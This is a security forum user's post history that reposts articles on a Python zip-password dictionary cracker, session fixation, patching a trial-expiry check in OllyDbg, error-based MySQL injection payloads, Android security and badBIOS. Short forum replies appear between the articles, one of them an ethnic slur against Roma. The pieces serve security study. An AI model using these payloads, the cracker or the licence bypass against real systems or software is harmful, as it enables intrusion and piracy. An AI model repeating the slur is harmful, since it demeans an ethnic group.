-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
[h=2]Sample Code – Dictionary Zip Cracker[/h] Posted by Adam on November 4, 2013 Leave a comment (0) Go to comments After reading Violent Python, I decided to try my hand at making a basic dictionary zip cracker just for fun. Some of the other free open source tools out there are great but it does work. I’m primarily posting it for fun and to test the blog’s new syntax highlighting. It can generate a biographical dictionary from a specified file’s ASCII strings as well as populate it with a recursive directory listing. Got the idea while studying for my AccessData cert. Their Password Recovery Toolkit does this in hopes of increasing the likelihood that the dictionary will contain a relevant password. The idea is that a user either used the word in the past or that it can be found elsewhere on his or her computer. A very cool idea that’s helped me on forensics challenges. I’ve designed the code below for Python 2.7.5 on Windows 7. It uses the Strings binary from Picnix Utils. You can also click here to download a copy. import argparseimport zipfile import subprocess import os print ''' SYNTAX: Dictionary: zipdict.py -f (zip) -d (dict) Bio Dictionary Generator: zipdict.py -f (zip) -s (file with desired strings) ''' parser = argparse.ArgumentParser(description='Zip file dictionary attack tool.') parser.add_argument('-f', help='Specifies input file (ZIP)', required=True) parser.add_argument('-d', help='Specifies the dictionary.', required=False) parser.add_argument('-s', help='Build ASCII strings dictionary.', required=False) args = parser.parse_args() zipfile = zipfile.ZipFile(args.f) print '{*} Cracking: %s' % args.f print '{*} Dictionary: %s' % args.d def biodictattack(): print '{*} Generating biographical dictionary...' stringsdict = open('stringsdict', 'w') stringsout = subprocess.Popen(['strings', args.f], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) for string in stringsout.stdout: stringsdict.write(string) stringsout.wait() walkpath = raw_input("Directory listing starting where? [ex. C:\] ") for root, dirs, files in os.walk(walkpath): for name in files: filenames = os.path.join(name) stringsdict.write(filenames + '\n') for root, dirs, files in os.walk(walkpath): for name in dirs: dirlisting = os.path.join(name) stringsdict.write(dirlisting + '\n') print '{*} Done. Re-run to crack with zipdict.py -f (zip) -d stringsdict' def dictattack(): dict = open(args.d, 'r') with open(args.d, 'r') as dict: for x in dict.readlines(): dictword = x.strip('\n') try: zipfile.extractall(pwd=dictword) print '{*} Password found = ' + dictword + '\n' print '{*} File contents extracted to zipdict path.' exit(0) except Exception, e: pass if args.s: biodictattack() else: dictattack() My next post will be on analyzing Volume Shadow Copies on Linux and some cool methods that I used on the 2013 DC3 Forensic Challenge. Sursa: Sample Code - Dictionary Zip Cracker | fork()
-
Understanding Session Fixation 1. Introduction Session ID is used to identify the user of web application. It can be sent with the GET method. An attacker can send a link to the user with predefined session ID. When the user logs in, the attacker can impersonate him, because the user uses the predefined session ID, which is known to the attacker. This is how session fixation works. As we can see, there is no need to guess the session ID because the attacker just chooses the session ID that will be used by the victim. 2. Environment Let’s analyze session fixation step by step in one of the lessons available in WebGoat [1]. WebGoat is a web application that is intentionally vulnerable. It can be useful for those who want to play with web application security stuff. The goal of WebGoat is to teach web application security lessons. WebGoat is part of the Samurai Web Testing Framework [2]. The Samurai Web Testing Framework is a Linux-based environment for web penetration testing. This aforementioned lesson is entitled “Session Fixation” (part of “Security Management Flaws”). It was created by Reto Lippuner and Marcel Wirth. 3. Session Fixation Lesson from WebGoat The attacker first sends a mail to a victim with a predefined session ID (SID). It has the value 12345 for the purpose of demonstration. The attacker has to convince the user to click the link. The victim gets the mail and is going to click the link to log in. As we can see, the link has a predefined session ID. The victim logs into the web application and is recognized by the attacker’s predefined session ID. The attacker knows the predefined session ID and is able to impersonate the user. 4. Summary Users can be impersonated when they use links with predefined session ID values chosen by the attacker. Session fixation was described and the lesson from WebGoat (“Session Fixation” from “Session Management Flaws” created by Reto Lippuner and Marcel Wirth) was presented to analyze session fixation step by step. The mitigation for session fixation would be session ID regeneration after successful log in of the user. Then the predefined session ID wouldn’t be helpful any longer to the attacker. References: [1] WebGoat https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project (access date: 22 October 2013) [2] Samurai Web Testing Framework Samurai Web Testing Framework (access date: 22 October 2013) By Dawid Czagan|October 31st, 2013 Sursa: Understanding Session Fixation - InfoSec Institute
-
Reverse Engineering with OllyDbg Abstract The objective of writing this paper is to explain how to crack an executable without peeping at its source code by using the OllyDbg tool. Although, there are many tools that can achieve the same objective, the beauty behind OllyDbg is that it is simple to operate and freely available. We have already done much reverse engineering of .NET applications earlier. This time, we are confronted with an application whose origin is unknown altogether. In simple terms, we are saying that we don’t have the actual source code. We have only the executable version, which is a tedious task of reverse engineering. Essentials The security researcher must have a rigorous knowledge of assembly programming language. It is expected that the machine is configured with the following tools: OllyDbg Assembly programming knowledge CFF explorer Patching Native Binaries When the source code is not provided, it is still possible to patch the corresponding software binaries in order to remove various security restrictions imposed by the vendor, as well as fixing the inherent bugs in the source code. A familiar type of restriction built into software is copy protection, which is normally forced by the software vendor in order to test the robustness of the software copy protection. In copy protection, the user is typically obliged to register the product before use. The vendor stipulates a time restriction on the beta software in order to avoid license misuse and to permit the product to run only in a reduced-functionality mode until the user registers. Executable Software The following sample shows a way of bypassing or removing the copy protection in order to use the product without extending the trial duration or, in fact, without purchasing the full version. The copy protection mechanism often involves a process in which the software checks whether it should run and, if it should, which functionality should be allowed. One type of copy protection common in trial or beta software allows a program to run only until a certain date. In order to explain reverse engineering, we have downloaded the beta version of software from the Internet that is operative for 30 days. As you can see, the following trial software application is expired and not working further and it shows an error message when we try to execute it. We don’t know in which programming language or under which platform this software is developed, so the first task is to identify its origin. We can engage CFF explorer, which displays some significant information such as that this software is developed by using VC++ language, as shown below. We can easily conclude that this is a native executable and it is not executing under CLR. We can’t use ILDASM or Reflector in order to analyze its opcodes. This time, we have to choose some different approach to crack the native executable. Disassembling with OllyDbg When we attempt to load the SoftwareExpiration.exe file, it will refuse to run because the current date is past the date on which the authorized trial expired. How can we use this software despite the expiration of the trial period? The following section illustrates the steps in the context of removing the copy protection restriction: The Road Map Load the expired program in order to understand what is happening behind the scenes. Debug this program with OllyDbg. Trace the code backward to identify the code path. Modify the binary to force all code paths to succeed and to never hit the trial expiration code path again. Test the modifications. Such tasks can also be accomplished by a powerful tool, IDA Pro, but it is commercial and not available freely. OllyDbg is not as powerful as IDA Pro, but it is useful in some scenarios. First download OllyDbg from its official website and configure it properly on your machine. Its interface looks like this: Now open the SoftwareExpiration.exe program in OllyDbg IDE from File à open menu and it will decompile that binary file. Don’t be afraid of the bizarre assembly code, because all the modifications are performed in the native assembly code. Here the red box shows the entry point instructions of the program, referred to as 00401204. The CPU main thread window displays the software code in form of assembly instructions that are executed in top-to-bottom fashion. That is why, as we stated earlier, assembly programming knowledge is necessary when reverse engineering a native executable. Unfortunately, we don’t have the actual source code, so how can we inspect the assembly code? Here the error message “Sorry, this trial software has expired” might help us to solve this problem because, with the help of this error message, we can identify the actual code path that leads to it. While the error dialog box is still displayed, start debugging by pressing F9 or from Debug menu. Now you can find the time limit code. Next, press F12 in order to pause the code execution so that we can find the code that causes the error message to be displayed. Okay. Now view the call stack by pressing the Alt+ K. Here, you can easily figure out that the trial error text is a parameter of MessageBoxA as follows: Select the USER32.MessageBoxA near the bottom of the call stack, right click, and choose “Show call”: This shows the starting point in which the assembly call to MessageBoxA is selected. Notice that the greater symbol (>) next to some of the lines of code, which indicates that another line of code jumps to that location. Directly before the call to MessageBoxA (in red color right-pane), four parameters are pushed onto the stack. Here the PUSH 10 instruction contains the > sign, which is referenced by another line of code. Select the PUSH 10 instruction located at 004011C0 address, the line of code that references the selected line is displayed in the text area below the top pane in the CPU windows as follows: Select the text area code in the above figure and right click to open the shortcut menu. It allows you to easily navigate to the code that refers to a selected line of code as shown: We have now identified the actual line of code that is responsible for producing the error message. Now it is time to do some modification to the binary code. The context menu in the previous figure shows that both 00401055 and 00401063 contains JA (jump above) to the PUSH 10 used for message box. First select the Go to JA 00401055 from the context menu. You should now be on the code at location 0×00401055. Your ultimate objective is to prevent the program from hitting the error code path. This can be accomplished by changing the JA instruction to NOP (no operation), which actually does nothing. Right click the 0×00401055 instruction inside the CPU window and select “Binary” and click over Fill with NOPs as shown below: This operation fills all the corresponding instruction for 0×00401055 with NOPs: Go back to PUSH 10 by pressing hyphen (~) and repeat the previous process for the instruction 0×00401063, as follows: Now save the modifications by right-clicking in the CPU window, clicking Copy to Executable, and then clicking All Modifications. Then hit the Copy all button in the next dialog box, as shown below: Right after hitting the “Copy all” button, a new window will appear named “SoftwareExpiration.exe.” Right-click in this window and choose Save File: Finally, save the modified or patched binary with a new name. Now load the modified program; you can see that no expiration error message is shown. We successfully defeated the expiration trial period restriction. Final Note This article demonstrates one way to challenge the strength of the copy protection measure using OllyDbg and to identify ways to make your software more secure against unauthorized consumption. By attempting to defeat the copy protection of your application, we can learn a great deal about how robust the protection mechanism is. By doing this testing before the product becomes publically available, we can modify the code to make circumvention of copy protection more difficult before its release. By Ajay Yadav|November 1st, 2013 Sursa: Reverse Engineering with OllyDbg - InfoSec Institute
-
Android 4.4 arrives with new security features - but do they really matter? Stefan Tanase Kaspersky Lab Expert Posted November 04, 15:53 GMT Last week, Google has released the 4.4 (KitKat) version of their omni-popular Android OS. Between the improvements, some have noticed several security-related changes. So, how much more secure is Android 4.4? When talking about Android 4.4 (KitKat) major security improvements, they can be divided into 2 categories: 1. Digital certificates Android 4.4 will warn the user if a Certificate Authority (CA) is added to the device, making it easy to identify Man-in-the-Middle attacks inside local networks. At the same time, Google Certificate Pinning will make it harder for sophisticated attackers to intercept network traffic to and from Google services, by making sure only whitelisted SSL certificates can connect to certain Google domains. 2. OS hardening SELinux is now running in enforcing mode, instead of permissive mode. This helps enforce permissions and thwart privilege escalation attacks, such as exploits that want to gain root access. Android 4.4 comes compiled with FORTIFY_SOURCE set at level 2, making buffer overflow exploits harder to implement. Privilege escalation and buffer overflows are techniques used for rooting mobile phones, so this makes it harder for Android 4.4 users to get root access on their device. On the bright side, it also makes it harder for malware to do the same, which is an important step in the infection of Android based terminals. From the point of view of malware threats, these enhancements do not really make a big difference. The most common Android infection source remains the same: unofficial apps downloaded from third-party stores. Nothing has changed here. One of the biggest problems in the Android ecosystem is the big amount of different versions of the OS, including ancient ones, that are still running on users’ mobile devices - this is known as version fragmentation. For instance, more than 25% of the users are still running Android 2.3, which has been released years ago. This between other things, represents a big security issue. Therefore, perhaps the most important change from KitKat is the lowered resource usage. Android 4.4 can run on devices with just 512MB of RAM, which for high end hardware means faster operation and better battery life, while for devices with less resources, the chance to use a modern, more secure OS. Power users have always wanted to use the latest versions of Android on their devices - that's why phone rooting has become so popular and that's why community projects such as CyanogenMod have evolved into fully-fledged companies. The real problem here, is the fact that most non-technical users will have to rely on hardware vendors to get an Android update. For instance, I have an old smartphone from a leading mobile phone maker from South Korea, that stopped receiving updates at Android 2.3.3. Sadly, many mobile phone makers prefer to withhold updates as a method of forcing users to purchase newer terminals. At the same time, this is effectively increasing the risk across their entire user base. It’s a pity this problem is not discussed in a wider manner. Sursa: https://www.securelist.com/en/blog/208214116/Android_4_4_arrives_with_new_security_features_but_do_they_really_matter
-
Notacon 10 - Encryption For Everyone Dru Streicher (_Node) Description: Encryption protects your privacy and is essential for communication. However encryption is sometimes complicated and hard to use. I want to discuss what encryption is, how it is used, and make it easy for everyone to use. This will be a very n00b friendly talk about how to actually use encryption in email, in websurfing, and on your hard drive. Bio I am a hardware hacker, chiptune musician (_node), and a system admin. I am a system administrator for Hurricane Labs (www.hurricanelabs.com), an information security company based in Cleveland. I am interested in security and all things opensource. I attended notacon last year for the first time and performed at pixeljam. I really had a good time last year and I would enjoy presenting a paper this year. For More Information please visit : - Notacon 11: April 10-13, 2014 in Cleveland, OH Notacon 10 (2013) Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Notacon 10 - Encryption For Everyone Dru Streicher (_Node)
-
Blackhat Eu 2013 - The Sandbox Roulette: Are You Ready For The Gamble? Description: What comes inside an application sandbox always stays inside the sandbox. Is it REALLY so? This talk is focused on the exploit vectors to evade commercially available sandboxes Las Vegas-style: We'll spin a "Sandbox Roulette" with various vulnerabilities on the Windows Operating System and then show how various application sandboxes hold up to each exploit. Each exploit will be described in detail and how it affected the sandbox. There is a growing trend in enterprise security practices to decrease the attack surface of vulnerable endpoints through the use of application sandboxing. Many different sandbox environments have been introduced by vendors in the security industry, including OS vendors, and even application vendors. Lack of sandboxing standards has led to the introduction of a range of solutions without consistent capabilities or compatibility and with their own inherent limitations. Moreover some application sandboxes are used by malware analysts to analyze malware and this could impose risks if the sandbox was breached. This talk will present an in-depth, security focused, technical analysis of the application sandboxing technologies available today. It will provide a comparison framework for different vendor technologies that is consistent, measurable, and understandable by both IT administrators and security specialists. In addition we will explore each of the major commercially available sandbox flavors, and evaluate their ability to protect enterprise data and the enterprise infrastructure as a whole. We will provide an architectural decomposition of sandboxing to highlight its advantages and limitations, and will interweave the discussion with examples of exploit vectors that are likely to be used by sophisticated malware to actively target sandboxes in the future. For More Information please visit : - Black Hat | Europe 2013 - Briefings Sursa: Blackhat Eu 2013 - The Sandbox Roulette: Are You Ready For The Gamble?
-
Error Based SQL Injection - Tricks In The Trade Trigger an error In this article I am going to describe some simple tips and tricks, which are useful to find and/or exploit error based on SQL injection. The tips/tricks will be for MySQL and PHP, because these are the most common systems you will encounter. Detect if database errors are displayed: Knowing if some database errors are displayed is a really valuable information, because it simplifies the process to detect injection points and exploiting a SQL vulnerability, we will discuss more of it later. But how do you provoke a error, even if everything is escaped correctly? Look for the integers: example: http://vulnsite.com/news.php?id=1 Let the assume id to be used internally as a integer in a MySQL query. Using testing vectors like id=1' or id=2-1 will not provoke any errors nor does the vector seem to be vulnerable to an injection. To provoke an error you can use the following values for id: 1) ?id=0X01 2) ?id=99999999999999999999999999999999999999999 The first example is a valid integer in PHP but not in MySQL, because of the uppercase X (there are even more difference, check PHP: Integers - Manual vs !!!). That's why this value provokes an error in the database. The second example will be converted by PHP to INF (which is also a integer in PHP , but it is definitely not a valid integer in the MySQL database. As an example, the query will look like this: SELECT title,text from news where id=INF By using this method, it is easy to determine if error reporting is enabled. This method will only work if the value is used internally as a integer. It won't provoke a database error if the value is used as a string! Using error reporting to our advantage: After getting the information that database errors are displayed, how can we use them for our advantage. In MySQL, it is not that easy in comparison to other DBMS to extract information via error reports. But there are two methods to do so: o) UPDATEXML and extractValue o) insane select statement Personally, I prefer using UPDATEXML( it is available since MySQL v. 5.1.5). Like its name suggest that it is used to modify a xml fragment, by specifying a XPATH expression. It has three parameters, the first one is the xml fragment, the second one the XPATH expression and the third one specifies the new fragment which will be inserted. A “normal” example: SELECT UpdateXML('<a><b>ccc</b><d></d></a>', '/b', '<e>fff</e>') Output: <a><b>ccc</b><d></d></a> What do you think will happen, if you specify a illegal xpath expression, like the @@version? Lets take a real life example to see what happens. Let us assume that the num parameter in the following url: http://example.com/author.php?num=2 ends up unescaped in the following query: SELECT name,date,username from author where number=2 Normally you would try to find the number of columns to construct a valid UNION SELECT. But lets assume none of the data are passed back to the webpage. You would need techniques like time based(sleep) or off-band (DNS etc.) to extract information. If error reporting is enabled, UPDATEXML can shorten this process a lot. To extract the version of the database, the following value for num would be enough: http://example.com/author.php?num=2 and UPDATEXML(null,@@version,null) ==> SELECT name,date,username from author where number=2 and UPDATEXML(null,@@version,null) This will produce an XPATH Syntax Error: `version´ It is also possible to create a complete select statement: UPDATEXML(null,(select schema_name from information_schema.schemata),null) Although UPDATEXML seems like a really awesome function it has a drawback too. It can only extract the last 20 bytes at a time. If you want to extract more bytes and still use error based extraction, you have to use the second method. The next example will create a query, which will create duplicate entry error. The duplicate entry will be the name of a table: select 1 from dual where 1=1 AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 1),FLOOR(RAND(0)*2))) That's all for now, but if you want to read on, here are some interesting links regarding SQL injection: -) The SQL Injection Knowledge Base (? Examples where taken from there, really the best sql injection cheat sheet IMHO) -) Methods of Quick Exploitation of Blind SQL Injection -) SQLi filter evasion cheat sheet (MySQL) | Reiners' Weblog About The Author Alex Infuhr is an independent security researcher, His core area of research includes Malware analysis and WAF bypassing. Sursa: Error Based SQL Injection - Tricks In The Trade | Learn How To Hack - Ethical Hacking and security tips
-
Raspunsul e simplu: Un hacker NU este infractor. Sunt 2 tipuri de persoane: 1. Persoanele care descopera/creaza lucruri noi: hackeri 2. Persoanele care le folosesc: altii Cu alte cuvinte: - ai descoperit o noua metoda de SQL Injection: time based, error based... Esti hacker. - ai folosit o astfel de metoda sa obtii acces si sa te lauzi ca esti smecher: esti o pula bleaga Faptul ca un personaj descopera o noua metoda de exploatare, sa zicem time based SQLI, sau creaza ceva util, sa zicem Metasploit/nmap... nu il face infractor, il face hacker. Faptul ca un alt personaj se foloseste de acea descoperire pentru a obtine adrese de mail, useri si parole, nu il face hacker, ci il face infractor. La fel, faptul ca un personaj foloseste Metasploit pentru a obtine ceva ilegal (generic vorbind), nu il face hacker ci infractor. Asta e pe scurt ideea.
-
Sunt banii tai?
-
Mori tigane.
-
Poate o sa par prost, dar ce sunt "Joint Ventures"?
-
Nu arata rau deloc
-
As prefera sa dati adresele de mail pe PM daca se poate. Spre binele vostru zic. Apoi, poate nu va dati si voi adresa de mail "personala". Spre binele vostru zic.
-
Da, bravo, esti printre putinele persoane care mai fac cate ceva... Daca ai timp, chiar daca gasesti sursa pentru o anumita functionalitate, incearca sa o faci tu singur. Chiar daca intelegi perfect o sursa, nu este de ajuns pana nu scrii tu linie cu linie. Iti mai sugerez sa incerci C# sau chiar C++.
-
Si zici ca ai facut tu "Remote Desktop"?
-
E mult prea mic intervalul, pune cel putin cateva milisecunde, nu microsecunde. E foarte posibil ca mecanismul de thread schedueling sa dureze mai mult (task switch-ul, salvarea registrilor si schimbarea pe un alt thread). De asemenea: usleep(3) - Linux man page [h=2]Errors[/h] EINTR Interrupted by a signal; see signal(7). EINVAL usec is not smaller than 1000000. (On systems where that is considered an error.) 4.3BSD, POSIX.1-2001. POSIX.1-2001 declares this function obsolete; use nanosleep(2) instead. POSIX.1-2008 removes the specification of usleep(). Cel mai probabil system call-ul dureaza mai mult decat sleep-ul propriu-zis. Radem, glumim, dar suntem si seriosi
-
Meet “badBIOS,” the mysterious Mac and PC malware that jumps airgaps Like a super strain of bacteria, the rootkit plaguing Dragos Ruiu is omnipotent. by Dan Goodin - Oct 31 2013 Aurich Lawson / Thinkstock Three years ago, security consultant Dragos Ruiu was in his lab when he noticed something highly unusual: his MacBook Air, on which he had just installed a fresh copy of OS X, spontaneously updated the firmware that helps it boot. Stranger still, when Ruiu then tried to boot the machine off a CD ROM, it refused. He also found that the machine could delete data and undo configuration changes with no prompting. He didn't know it then, but that odd firmware update would become a high-stakes malware mystery that would consume most of his waking hours. In the following months, Ruiu observed more odd phenomena that seemed straight out of a science-fiction thriller. A computer running the Open BSD operating system also began to modify its settings and delete its data without explanation or prompting. His network transmitted data specific to the Internet's next-generation IPv6 networking protocol, even from computers that were supposed to have IPv6 completely disabled. Strangest of all was the ability of infected machines to transmit small amounts of network data with other infected machines even when their power cords and Ethernet cables were unplugged and their Wi-Fi and Bluetooth cards were removed. Further investigation soon showed that the list of affected operating systems also included multiple variants of Windows and Linux. "We were like, 'Okay, we're totally owned,'" Ruiu told Ars. "'We have to erase all our systems and start from scratch,' which we did. It was a very painful exercise. I've been suspicious of stuff around here ever since." In the intervening three years, Ruiu said, the infections have persisted, almost like a strain of bacteria that's able to survive extreme antibiotic therapies. Within hours or weeks of wiping an infected computer clean, the odd behavior would return. The most visible sign of contamination is a machine's inability to boot off a CD, but other, more subtle behaviors can be observed when using tools such as Process Monitor, which is designed for troubleshooting and forensic investigations. Another intriguing characteristic: in addition to jumping "airgaps" designed to isolate infected or sensitive machines from all other networked computers, the malware seems to have self-healing capabilities. "We had an air-gapped computer that just had its [firmware] BIOS reflashed, a fresh disk drive installed, and zero data on it, installed from a Windows system CD," Ruiu said. "At one point, we were editing some of the components and our registry editor got disabled. It was like: wait a minute, how can that happen? How can the machine react and attack the software that we're using to attack it? This is an air-gapped machine and all of the sudden the search function in the registry editor stopped working when we were using it to search for their keys." Over the past two weeks, Ruiu has taken to Twitter, Facebook, and Google Plus to document his investigative odyssey and share a theory that has captured the attention of some of the world's foremost security experts. The malware, Ruiu believes, is transmitted though USB drives to infect the lowest levels of computer hardware. With the ability to target a computer's Basic Input/Output System (BIOS), Unified Extensible Firmware Interface (UEFI), and possibly other firmware standards, the malware can attack a wide variety of platforms, escape common forms of detection, and survive most attempts to eradicate it. But the story gets stranger still. In posts here, here, and here, Ruiu posited another theory that sounds like something from the screenplay of a post-apocalyptic movie: "badBIOS," as Ruiu dubbed the malware, has the ability to use high-frequency transmissions passed between computer speakers and microphones to bridge airgaps. Bigfoot in the age of the advanced persistent threat At times as I've reported this story, its outline has struck me as the stuff of urban legend, the advanced persistent threat equivalent of a Bigfoot sighting. Indeed, Ruiu has conceded that while several fellow security experts have assisted his investigation, none has peer reviewed his process or the tentative findings that he's beginning to draw. (A compilation of Ruiu's observations is here.) Also unexplained is why Ruiu would be on the receiving end of such an advanced and exotic attack. As a security professional, the organizer of the internationally renowned CanSecWest and PacSec conferences, and the founder of the Pwn2Own hacking competition, he is no doubt an attractive target to state-sponsored spies and financially motivated hackers. But he's no more attractive a target than hundreds or thousands of his peers, who have so far not reported the kind of odd phenomena that has afflicted Ruiu's computers and networks. In contrast to the skepticism that's common in the security and hacking cultures, Ruiu's peers have mostly responded with deep-seated concern and even fascination to his dispatches about badBIOS. "Everybody in security needs to follow @dragosr and watch his analysis of #badBIOS," Alex Stamos, one of the more trusted and sober security researchers, wrote in a tweet last week. Jeff Moss—the founder of the Defcon and Blackhat security conferences who in 2009 began advising Department of Homeland Security Secretary Janet Napolitano on matters of computer security—retweeted the statement and added: "No joke it's really serious." Plenty of others agree. "Dragos is definitely one of the good reliable guys, and I have never ever even remotely thought him dishonest," security researcher Arrigo Triulzi told Ars. "Nothing of what he describes is science fiction taken individually, but we have not seen it in the wild ever." Been there, done that Triulzi said he's seen plenty of firmware-targeting malware in the laboratory. A client of his once infected the UEFI-based BIOS of his Mac laptop as part of an experiment. Five years ago, Triulzi himself developed proof-of-concept malware that stealthily infected the network interface controllers that sit on a computer motherboard and provide the Ethernet jack that connects the machine to a network. His research built off of work by John Heasman that demonstrated how to plant hard-to-detect malware known as a rootkit in a computer's peripheral component interconnect, the Intel-developed connection that attaches hardware devices to a CPU. It's also possible to use high-frequency sounds broadcast over speakers to send network packets. Early networking standards used the technique, said security expert Rob Graham. Ultrasonic-based networking is also the subject of a great deal of research, including this project by scientists at MIT. Of course, it's one thing for researchers in the lab to demonstrate viable firmware-infecting rootkits and ultra high-frequency networking techniques. But as Triulzi suggested, it's another thing entirely to seamlessly fuse the two together and use the weapon in the real world against a seasoned security consultant. What's more, use of a USB stick to infect an array of computer platforms at the BIOS level rivals the payload delivery system found in the state-sponsored Stuxnet worm unleashed to disrupt Iran's nuclear program. And the reported ability of badBIOS to bridge airgaps also has parallels to Flame, another state-sponsored piece of malware that used Bluetooth radio signals to communicate with devices not connected to the Internet. "Really, everything Dragos reports is something that's easily within the capabilities of a lot of people," said Graham, who is CEO of penetration testing firm Errata Security. "I could, if I spent a year, write a BIOS that does everything Dragos said badBIOS is doing. To communicate over ultrahigh frequency sound waves between computers is really, really easy." Coincidentally, Italian newspapers this week reported that Russian spies attempted to monitor attendees of last month's G20 economic summit by giving them memory sticks and recharging cables programmed to intercept their communications. Eureka For most of the three years that Ruiu has been wrestling with badBIOS, its infection mechanism remained a mystery. A month or two ago, after buying a new computer, he noticed that it was almost immediately infected as soon as he plugged one of his USB drives into it. He soon theorized that infected computers have the ability to contaminate USB devices and vice versa. "The suspicion right now is there's some kind of buffer overflow in the way the BIOS is reading the drive itself, and they're reprogramming the flash controller to overflow the BIOS and then adding a section to the BIOS table," he explained. He still doesn't know if a USB stick was the initial infection trigger for his MacBook Air three years ago, or if the USB devices were infected only after they came into contact with his compromised machines, which he said now number between one and two dozen. He said he has been able to identify a variety of USB sticks that infect any computer they are plugged into. At next month's PacSec conference, Ruiu said he plans to get access to expensive USB analysis hardware that he hopes will provide new clues behind the infection mechanism. He said he suspects badBIOS is only the initial module of a multi-staged payload that has the ability to infect the Windows, Mac OS X, BSD, and Linux operating systems. Dragos Ruiu Julia Wolf "It's going out over the network to get something or it's going out to the USB key that it was infected from," he theorized. "That's also the conjecture of why it's not booting CDs. It's trying to keep its claws, as it were, on the machine. It doesn't want you to boot another OS it might not have code for." To put it another way, he said, badBIOS "is the tip of the warhead, as it were." “Things kept getting fixed” Ruiu said he arrived at the theory about badBIOS's high-frequency networking capability after observing encrypted data packets being sent to and from an infected laptop that had no obvious network connection with—but was in close proximity to—another badBIOS-infected computer. The packets were transmitted even when the laptop had its Wi-Fi and Bluetooth cards removed. Ruiu also disconnected the machine's power cord so it ran only on battery to rule out the possibility it was receiving signals over the electrical connection. Even then, forensic tools showed the packets continued to flow over the airgapped machine. Then, when Ruiu removed internal speaker and microphone connected to the airgapped machine, the packets suddenly stopped. With the speakers and mic intact, Ruiu said, the isolated computer seemed to be using the high-frequency connection to maintain the integrity of the badBIOS infection as he worked to dismantle software components the malware relied on. "The airgapped machine is acting like it's connected to the Internet," he said. "Most of the problems we were having is we were slightly disabling bits of the components of the system. It would not let us disable some things. Things kept getting fixed automatically as soon as we tried to break them. It was weird." It's too early to say with confidence that what Ruiu has been observing is a USB-transmitted rootkit that can burrow into a computer's lowest levels and use it as a jumping off point to infect a variety of operating systems with malware that can't be detected. It's even harder to know for sure that infected systems are using high-frequency sounds to communicate with isolated machines. But after almost two weeks of online discussion, no one has been able to rule out these troubling scenarios, either. "It looks like the state of the art in intrusion stuff is a lot more advanced than we assumed it was," Ruiu concluded in an interview. "The take-away from this is a lot of our forensic procedures are weak when faced with challenges like this. A lot of companies have to take a lot more care when they use forensic data if they're faced with sophisticated attackers." Sursa: Meet “badBIOS,” the mysterious Mac and PC malware that jumps airgaps | Ars Technica
-
The Teredo Protocol: Tunneling Past Network Security and Other Security Implications Dr. James Hoagland Principal Security Researcher Symantec Advanced Threat Research Contents Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6 Overview: How Teredo works . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7 Teredo components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7 Teredo setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .9 Teredo addresses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .10 Origin data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .10 Qualification procedure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .11 Secure qualification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .12 Bubble packets and creating a NAT hole . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .13 Packet relaying and peer setup for non-Teredo peers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14 Finding a relay from IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14 Ping test and finding a relay from IPv4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .15 Packet relaying and peer setup for Teredo peers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .16 Trusted state . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .16 Required packet filtering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .17 Teredo security considerations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .18 Security of NAT types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .18 Teredo’s open-ended tunnel (a.k.a. extra security burden on end host) . . . . . . . . . . . . . . . . . . . . . .19 Allowed packets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .20 Teredo and IPv6 source routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .21 IPv4 ingress filtering bypass . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .22 Teredo and bot networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .22 Teredo implications on ability to reach a host through a NAT . . . . . . . . . . . . . . . . . . . . . . . . . . . .22 Information revealed to third parties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24 Symantec Advanced Threat Research The Teredo Protocol Tunneling Past Network Security and Other Security Implications Contents (cont’d) Teredo anti-spoofing measures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24 Peer address spoofing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .25 Server spoofing . . . . . . 